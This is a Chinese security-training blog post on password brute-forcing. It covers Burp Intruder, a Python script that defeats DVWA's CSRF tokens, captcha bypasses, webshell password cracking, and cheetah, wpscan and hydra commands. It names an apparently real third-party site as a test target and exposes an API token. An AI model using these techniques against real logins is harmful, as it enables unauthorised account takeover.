



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="https://sun-spots.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="https://sun-spots.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="https://sun-spots.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="https://sun-spots.github.io/2022/03/02/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/">



  <title>
 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 6.0.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2022-03-02 10:53:37">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2022-03-02T10:53:37+08:00">2022-03-02</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicljitigmj20zk0m87fp.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicivghyooj20zk0m8dir.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipesx5fdwj20zk0m81kx.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipey0a334j20zk0m8qpt.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipevuctzzj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giclfdu6exj20zk0m87hw.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://sun-spots.github.io/2022/03/02/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="第一天穷举"><a class="markdownIt-Anchor" href="#第一天穷举">#</a> 第一天：穷举</h1>
<h1 id="概述"><a class="markdownIt-Anchor" href="#概述">#</a> 概述</h1>
<p>穷举就是枚举的意思，在互联网的今天，需要使用某种的服务，大多数都需要口令登录，这个口令就是密码，密码的强度分为，弱口令 、中度口令、强度口令。 如果登录的服务为弱口令，那会存在很大的安全隐患，黑客通过穷举弱口令对服务进行攻击，很容易就得到登录密码。得到密码之后就能登录服务，进行其他危害较大得操作。黑客也能通过对用户得信息整理，组合密码进行穷举攻击。例如：根据用户的生日号码，出身年月日和姓名进行口令组合，再对其服务进行穷举；</p>
<p>综合工具：密码字典，爆破工具：</p>
<p>链接：<span class="exturl" data-url="aHR0cHM6Ly9wYW4uYmFpZHUuY29tL3MvMUhWaElNU0RYWXJoNmpzWEdSRzdoX0E=">https://pan.baidu.com/s/1HVhIMSDXYrh6jsXGRG7h_A</span> 提取码：li5k</p>
<h1 id="常见的服务"><a class="markdownIt-Anchor" href="#常见的服务">#</a> 常见的服务</h1>
<p>FTP 端口号 20 和 21 的主要区别在于，20 端口号是用于传输数据（包括接收和传送文件），21 端口号则是用于传输控制信息（接收和传送 FTP 指令）。</p>
<p>详见：<span class="exturl" data-url="aHR0cHM6Ly93d3cuaWRjc3B5LmNvbS8zNTg5Ni5odG1s">https://www.idcspy.com/35896.html</span></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628076688797-4e47a581-28ef-45f3-a342-e23e13ec601f.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628076700758-0e5a4203-73a5-4f44-a1da-6282a8312d7d.png" alt="img"></p>
<h1 id="burp穷举后台密码"><a class="markdownIt-Anchor" href="#burp穷举后台密码">#</a> Burp 穷举后台密码</h1>
<p>截取包之后发送到 intruder 给密码设置变量；</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cueXVxdWUuY29tL2RvY3Mvc2hhcmUvMjQyNTUwMzktNDk2Mi00YTlhLWI3NTgtMzIzYzRmNTExMTM4PyMlRUYlQkMlODglRTUlQUYlODYlRTclQTAlODElRUYlQkMlOUF6eTFkJUVGJUJDJTg5">https://www.yuque.com/docs/share/24255039-4962-4a9a-b758-323c4f511138?#（密码：zy1d）</span> 《基于表单的暴力破解》</p>
<p>测试网站：<span class="exturl" data-url="aHR0cDovL3d3dy5oYXBweXRveXMuY29tLnR3L2hhcHB5dG95c21rMi91c2VyLnBocA==">http://www.happytoys.com.tw/happytoysmk2/user.php</span></p>
<p>账号：test</p>
<p>密码：123456</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628078234896-6f804bb0-c18d-41f4-a806-3ea4f1708efc.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628078484342-941e0078-8d59-4962-9ef7-de21ac59249f.png" alt="img"></p>
<p>设置攻击后，根据返回的状态码 status 或者 length 网页长度对其进行判断，这里得到正确得密码是 123456</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628078560436-6fdb294a-9771-43b7-987d-899d8b312631.png" alt="img"></p>
<h1 id="burp对webshell穷举"><a class="markdownIt-Anchor" href="#burp对webshell穷举">#</a> Burp 对 webshell 穷举</h1>
<p>灰帽子对网站攻破后，一般会留后门方便对其网站进行非法管理。后门的程序语言包括 asp php .net 这些脚本文件放在网站目录， 一般都采用单密码进行登录，通过扫描获取 webshell 的后门的网址，得到网址后可以对其进行密码穷举；</p>
<p>截取包之后发送到 intruder 给密码设置变量；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079049316-3b2def9e-744b-4d57-a6d8-92c2f2b89ada.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079133670-2424957b-0419-40d4-a6fb-dbf2c466260c.png" alt="img"></p>
<h1 id="有-token-防御的网站后台穷举破"><a class="markdownIt-Anchor" href="#有-token-防御的网站后台穷举破">#</a> 有 token 防御的网站后台穷举破</h1>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cueXVxdWUuY29tL2RvY3Mvc2hhcmUvNjdjMTBkNjctZDg3MS00NTM1LThhYzgtYzQ1ZDU5OGI4ZWIzPyMlRUYlQkMlODglRTUlQUYlODYlRTclQTAlODElRUYlQkMlOUFneXFhJUVGJUJDJTg5">https://www.yuque.com/docs/share/67c10d67-d871-4535-8ac8-c45d598b8eb3?#（密码：gyqa）</span> 《Token 防爆破》</p>
<p>有的网站后台存在 token 值，这个 token 通俗的名字叫令牌，每次刷新页面都会随机变化，提交请求时必须携带这个 token 值，可以利用这点避免后台进行直接穷举和防止 csrf 攻击；</p>
<p>我们每次刷新，都可以看到这个 token 的值会改变；</p>
<p>但如果直接爆破的话会是用的第一次的 token 的值，如果第二次密码进行匹配的时候，他还是第一次的 token 的值的话，服务端那边的 token 的值就是不匹配的，所以就会提示 csrf 攻击；</p>
<p>所以我们每次进行爆破的时候也许要让他跟随改变；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079340667-4811eb6a-0e54-48f6-b177-5951b5a1cad4.png" alt="img"></p>
<h2 id="burp设置宏获取-token-对网站后台密码破解"><a class="markdownIt-Anchor" href="#burp设置宏获取-token-对网站后台密码破解">#</a> Burp 设置宏获取 token 对网站后台密码破解</h2>
<p>打开 burpsuite 刷新页面，接着 forward 放行这个数据；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079451206-3d804314-3acc-4e52-ac7f-2937a1fe379a.png" alt="img"></p>
<p>来到 Project options --&gt; Session-- &gt;add 添加回话处理规则</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079591158-1fdbd888-c52c-43e0-b5b1-eca8b3b5e4d4.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079614917-871b9a5c-9c07-4c9e-aa8a-e703675e1f1e.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079646159-85fcf3b9-cac1-42cf-896b-9b491008877f.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079681778-cc70cb9f-2d38-48a0-8eb4-8df4f53fa067.png" alt="img"></p>
<p>网页历史选择提交之后有 token 的页面；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079707770-6f965015-25dd-4004-947b-74afd313e1d6.png" alt="img"></p>
<p>设置  项目设置（ configure item ）</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079810511-40fc8db7-faf8-4903-8772-fbfa17bcf032.png" alt="img"></p>
<p>选择 value 的值 Parameter name 填写 user_token 这个值一定要相同；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628079992637-14f34776-a3ef-42bc-8623-02287b2d5898.png" alt="img"></p>
<p>一路 OK，到下面这个页面，设置仅更新此参数；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628080193319-295402a7-a035-446f-affe-e00ac7c50b2b.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628080168352-404b2e4d-8dd6-40c0-8094-83662371ada1.png" alt="img"></p>
<p>设置范围，当然，不设置也是没问题的；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628081098325-d1acc6cc-8ba8-4cbf-b1cb-94f8f44483d2.png" alt="img"></p>
<p>抓登陆包，截取包之后发送到 intruder 给密码设置变量；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628081291931-3ac9ce73-e521-46b5-ac25-2c3111104f3d.png" alt="img"></p>
<p>这是时候注意，因为 DVWA 是登陆后进行跳转的，所以我们爆破出来的页面都是 302 跳转的状态码，我们要设置一下跟随跳转；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628081355070-269f58a0-98a9-41ac-93f4-c502582d0ac2.png" alt="img"></p>
<p>因存在问题，持续更新。。。</p>
<h2 id="编写脚本获取-token-对网站后台密码破解"><a class="markdownIt-Anchor" href="#编写脚本获取-token-对网站后台密码破解">#</a> 编写脚本获取 token 对网站后台密码破解</h2>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628130166655-67f2b38a-d3b5-4ec2-b1fc-999a7eb8d597.png" alt="img"></p>
<p>每次访问页面这个 user_token 都会变化导致不能重复提交，验证原理每次页面生成 user_token 存在 seesion 里面每次登录用 session 里取出来 然后验证如果验证成功，就进行密码匹配。如果验证不成功就输出 csrf 错误；</p>
<p>脚本源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#coding:utf-8</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">url = &quot;http://192.168.0.56/DVWA/login.php&quot;</span><br><span class="line"></span><br><span class="line">def login(password):</span><br><span class="line">    session = requests.session()</span><br><span class="line">    req=session.get(url)</span><br><span class="line">    user_token=re.search(&quot;[a-z0-9]&#123;32&#125;&quot;,req.text).group(0) #32md5</span><br><span class="line">    data=&#123;&quot;username&quot;:&quot;admin&quot;,&quot;password&quot;:password,&quot;Login&quot;:&quot;Login&quot;,&#x27;user_token&#x27;:user_token&#125;</span><br><span class="line">    req=session.post(url=url,data=data,allow_redirects=True)</span><br><span class="line">    html = req.text</span><br><span class="line">    return html</span><br><span class="line"></span><br><span class="line">with open(&#x27;top1000.txt&#x27;) as p:</span><br><span class="line">    passlist =p.readlines()</span><br><span class="line">    p.close()</span><br><span class="line"></span><br><span class="line">for line in passlist:</span><br><span class="line">    line = line.strip(&quot;\n&quot;)</span><br><span class="line">    print(line)</span><br><span class="line">    if &#x27;File Upload&#x27; in login(line):</span><br><span class="line">        print( &quot;[* 密码 is %s *]&quot; % line )</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628130458034-eb217c4e-bcd0-4e75-a711-28fa0aa221a0.png" alt="img"></p>
<h1 id="针对有验证码后台的穷举方法"><a class="markdownIt-Anchor" href="#针对有验证码后台的穷举方法">#</a> 针对有验证码后台的穷举方法</h1>
<p>网站后台或者有登录的地方都可能存在验证码验证，验证码的作用给网站为了防止用户利用机器人自动注册、登录、灌水，都会采用验证码技术，所谓的验证码，就是将一串随机产生的数字和符号，生成一幅图片，在图像上加上干扰像素（防止 orc），要用户用肉眼识别其中的验证码信息，输入表单提交网站验证，验证后使用网站某个功能，但是如果验证码逻辑编写不好会存在被绕过的风险；</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cueXVxdWUuY29tL2RvY3Mvc2hhcmUvMDBjZjJlZWMtZTBlZS00MGJkLTljNDEtZGQzZmFlMTM5NTUwPyMlRUYlQkMlODglRTUlQUYlODYlRTclQTAlODElRUYlQkMlOUF3Z2E1JUVGJUJDJTg5">https://www.yuque.com/docs/share/00cf2eec-e0ee-40bd-9c41-dd3fae139550?#（密码：wga5）</span> 《验证码绕过 (on client)》</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cueXVxdWUuY29tL2RvY3Mvc2hhcmUvODBjNGRiYWYtOWI2Zi00YTEwLTkxZDktNDFhMTMxYmVhODg2PyMlRUYlQkMlODglRTUlQUYlODYlRTclQTAlODElRUYlQkMlOUF5bnQ5JUVGJUJDJTg5">https://www.yuque.com/docs/share/80c4dbaf-9b6f-4a10-91d9-41a131bea886?#（密码：ynt9）</span> 《验证码绕过 (on server)》</p>
<h2 id="cookie-不存在不验证绕过"><a class="markdownIt-Anchor" href="#cookie-不存在不验证绕过">#</a> cookie 不存在不验证绕过</h2>
<p>环境：CmsEasy 7_7_3_20210505</p>
<p>有些网站如果网站不存在 cookie 就不会验证验证码 ；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628156321735-2fd8e60d-cd16-45d8-876f-0a7b95ffda6e.png" alt="img"></p>
<p>删除 PHPSESSION 信息，验证码就不进行验证了；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628156360161-37537749-2c41-4fc4-bf49-8c791e1bf086.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628156372788-bf7f6250-9dc0-49de-a26f-ab33801bcbea.png" alt="img"></p>
<p>穷举密码</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628156485801-9a6c95a9-c996-4ee1-ae82-dd35ee5165b8.png" alt="img"></p>
<h2 id="后台登录验证码没销毁进行穷举"><a class="markdownIt-Anchor" href="#后台登录验证码没销毁进行穷举">#</a> 后台登录验证码没销毁进行穷举</h2>
<p>在登录提交的时候进行验证码验证，不管密码是否正确，都要销毁验证码；</p>
<p>不然验证码就可能会存在复用情况；</p>
<p>环境：emlog5.3.1</p>
<p>输入账号密码，提交抓包，首先第一次提示的是密码错误，不修改再提交一次同样是密码错误；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628332485026-0e44f905-0726-4e12-b7aa-b5a1a296adff.png" alt="img"></p>
<p>修改错误的验证码，可以发现，变成了验证错误；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628332547436-d54ba1bb-7b5d-417f-85e8-0050a082c9ed.png" alt="img"></p>
<p>转到 intruder 模块进行爆破，注意，是正确的验证码，不是修改后的验证码；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628332941941-b8bf9284-97bb-4340-93c1-3aeb3107a6d9.png" alt="img"></p>
<p>登陆成功，都会有 302 跳转的；</p>
<h2 id="网站后台验证码识别穷举密码"><a class="markdownIt-Anchor" href="#网站后台验证码识别穷举密码">#</a> 网站后台验证码识别穷举密码</h2>
<p>验证码干扰像素太少很容易就会被一些工具识别出来。如图片提取文字工具；</p>
<p>环境：emlog5.3.1</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628333623332-ea5f12bc-c59c-4a83-92d4-8fa58924cd4d.png" alt="img"></p>
<p>右键查看图片地址就可以看到图片文件的路径；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628333667374-d675e240-d195-40cf-90cb-acfbe7f3f6b5.png" alt="img"></p>
<p>这里我们可以用到一个工具 codex 验证码后台登录爆破辅助工具 <span class="exturl" data-url="aHR0cHM6Ly93YXJzZWMueXVxdWUuY29tL2F0dGFjaG1lbnRzL3l1cXVlLzAvMjAyMS96aXAvMjk0MjIyNi8xNjQwNzYxMTQ1NDcxLWQ4YjUwMjFlLTIyYTktNDkwZC1hYWUzLTE0M2EyMDY5NTc0NC56aXA=">📎Codex 验证码后台爆破 V2.1.zip</span>；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628333830143-c62aa3d6-c957-42d7-b0c6-2dbc103aae7f.png" alt="img"></p>
<p>使用 burp 抓取登录数据包，复制请求包到请求拦内；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628333892818-2437a5be-cfed-47ee-afff-fabb3009a199.png" alt="img"></p>
<p>标记验证码，并且标记密码，选择爆破密码，将验证码的地址复制上去，最后导入密码；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628334075074-fa20448a-5eaf-4f8e-99b5-961290258161.png" alt="img"></p>
<p>导入密码这有个坑点，你可能会看到下面这个样子；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628334152409-5236e9f6-f16e-4233-8174-a9729b65fc0d.png" alt="img"></p>
<p>这是因为每行一个默认是 unix 系统的适配字典，而不是 windos 的，所以会识别一个，使用 sublime text 工具打开字典，全选，视图–&gt; 行结束符–&gt;windows 换行符    改一下保存就可以了；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628334364508-7387e656-b5b3-41e5-a1a4-7fd19fc7e9bd.png" alt="img"></p>
<p>回到爆破栏， 选择错误的验证码关键词，错误的页面会返回的关键字，比如 &quot;验证错误&quot;，设置线程 点击 start 即可 可以选择 再次爆破 验证准确率会提高；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628334481997-50e5ba23-fa06-4016-b37e-434307e6f4e2.png" alt="img"></p>
<p>看长度，判断密码，看返回包，判断密码，可以看到密码就是 123456；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628334521704-720c9527-7840-4d1b-a3c6-e47e6c3e85eb.png" alt="img"></p>
<h1 id="phpmyadmin-密码穷举"><a class="markdownIt-Anchor" href="#phpmyadmin-密码穷举">#</a> phpmyadmin 密码穷举</h1>
<p>phpmyadmin 是 mysql 的一个 web 管理工具，可以通过这个工具穷举 mysql 用户的账号和密码 ；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628335349845-86faecc6-f73b-4ef5-a701-1a1f762f09a7.png" alt="img"></p>
<h1 id="一句话木马后门破解"><a class="markdownIt-Anchor" href="#一句话木马后门破解">#</a> 一句话木马后门破解</h1>
<p>一句话后门可以使用 burpsuite 通用穷举方法穷举密码；</p>
<p>抓到包后就可以右键转换请求方法；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628336175693-a6105167-3fc5-4914-af3b-6d12cd621ecf.png" alt="img"></p>
<p>数据包发送到 intruder 模块下，将 cmd 设置为变量，导入字典进行爆破；</p>
<p>这里准备了三个关键词，因为每个脚本语言的不同，执行命令也不同，不可能都使用 phpinfo () 函数来输出，我们可以让成功成功的密码返回指定的内容；</p>
<p>asp</p>
<p>execute(“response.clear:response.write(”“passwordright”&quot;):response.end&quot;)</p>
<p>php</p>
<p>echo “password rig”;</p>
<p>aspx</p>
<p>Response.Write(“ruchu666”);</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628336276240-51c39f82-f2e1-4669-985a-ab74cf1dbf83.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628336361947-ae9f3591-5a03-4643-afc2-aab1c75c5cdd.png" alt="img"></p>
<h1 id="cheetah-对一句后门密码穷举"><a class="markdownIt-Anchor" href="#cheetah-对一句后门密码穷举">#</a> cheetah 对一句后门密码穷举</h1>
<p>cheetah 是针对一句话后门的穷举工具；</p>
<p>只能在 kali 内运行；</p>
<h3 id="使用方法"><a class="markdownIt-Anchor" href="#使用方法">#</a> 使用方法：</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">python cheetah.py -u http://orz/orz.php</span><br><span class="line">python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v</span><br><span class="line">python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list</span><br><span class="line">python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000</span><br><span class="line">python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v</span><br><span class="line">cheetah.py -u http://www.c1moon.com/a.php -n 1000 -v -p data/pwd.list</span><br><span class="line">cheetah.py -u http://www.c1moon.com/a.asp -n 1000 -v -p data/pwd.list</span><br><span class="line">cheetah.py -u http://www.c1moon.com/a.aspx -n 1000 -v -p data/pwd.lis</span><br><span class="line"></span><br><span class="line">支持 asp php .net jsp 后门</span><br><span class="line">-u 后门地址</span><br><span class="line">-r 提交的方法 一般是 post</span><br><span class="line">-n 一次提交密码的数量</span><br><span class="line">-v 详细信息</span><br><span class="line">-p 字典位置</span><br></pre></td></tr></table></figure>
<p>python3 <span class="exturl" data-url="aHR0cDovL2NoZWV0YWgucHk=">cheetah.py</span> -u <span class="exturl" data-url="aHR0cDovL3d3dy5jMW1vb24uY29tL2NtZC5waHA=">http://www.c1moon.com/cmd.php</span> -r post -n 1000</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628341590420-23613fe8-a311-4a93-b01b-580fdf84d8f7.png" alt="img"></p>
<h1 id="wordpress-博客系统用户密码穷举"><a class="markdownIt-Anchor" href="#wordpress-博客系统用户密码穷举">#</a> wordpress 博客系统用户密码穷举</h1>
<p>wordpress 是知名的博客系统，在互联网上的占有量很大，所以一定要知道这套 系统的弱口令穷举的方法；</p>
<p>爆破 wordpress 博客系统的话我们会用到 wpscan 这个工具，专门针对于 wordpress 博客系统进行安全评估的工具；</p>
<p>爆破之前我们需要先获取一个 token，因为 wordpress 有很多插件，需要使用 token 去加载插件，然后进行安全评估；</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93cHNjYW4uY29t">https://wpscan.com</span> 首先到这个网站注册账号和密码注册后获取 token；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628350194726-5837006c-3681-47f2-8442-746a6c8c2411.png" alt="img"></p>
<p>kali 自带 wpscan，-e u 参数自动找账号信息，然后登录穷举；</p>
<p>wpscan --url <span class="exturl" data-url="aHR0cDovL3d3dy5yZWR0ZWFtLmNvbS8=">http://www.redteam.com/</span> -e u -P /home/kali/top100password.txt --api-token DTa0mUG4l04uquwu4WvAIJuFAESdT7hSoORsutqbf3c</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628351481457-29a4bcf8-234d-44a2-9cb6-5800143c03d7.png" alt="img"></p>
<p>如果上面这个工具爆破之后什么信息都没找到，那我们可以尝试手动查找信息爆破；</p>
<p>手动收集 wordpress 用户信息，访问连接获取用户：</p>
<ul>
<li>
<ul>
<li>/wp-json/wp/v2/users    获取信息可以再进行指定用户爆破；</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628351772119-76d0a65e-d2e3-4793-81d6-0adfdecd9c23.png" alt="img"></p>
<p>获取到用户账户名后，在进行爆破；</p>
<p>wpscan --url <span class="exturl" data-url="aHR0cDovL3d3dy5yZWR0ZWFtLmNvbQ==">http://www.redteam.com</span> -U admin -P /home/kali/Desktop/top100password.txt</p>
<ul>
<li>
<ul>
<li>使用账号名爆破就不需要在加 token 了；</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628351954812-b5dc07c2-91dc-41ab-8475-57478ba5de4c.png" alt="img"></p>
<h1 id="常见的端口服务穷举"><a class="markdownIt-Anchor" href="#常见的端口服务穷举">#</a> 常见的端口服务穷举</h1>
<h2 id="hydra-密码穷举工具的使用"><a class="markdownIt-Anchor" href="#hydra-密码穷举工具的使用">#</a> hydra 密码穷举工具的使用</h2>
<p>Hydra 是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解，如 FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP 和 VNC 等。其密码能否被破解，关键在于字典是否足够强大。很多用户可能对 Hydra 比较熟悉，因为该工具有图形界面，且操作十分简单，基本上可以 “傻瓜” 操作；</p>
<p>美国队长中的大反派 hydra（九头蛇）组织</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1625908987962-4f1b6663-a433-403a-92c3-78cb45f7441f.png" alt="img"></p>
<p>hydra 是著名组织 thc 的一款开源的暴力破解密码工具，功能非常强大；</p>
<p>kali 下是默认安装的，几乎支持所有协议的在线破解；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628352229934-1c23bb9b-73c8-4933-a2cf-dce46100df99.png" alt="img"></p>
<p>密码能否破解，在于字典是否强大以及电脑的性能；</p>
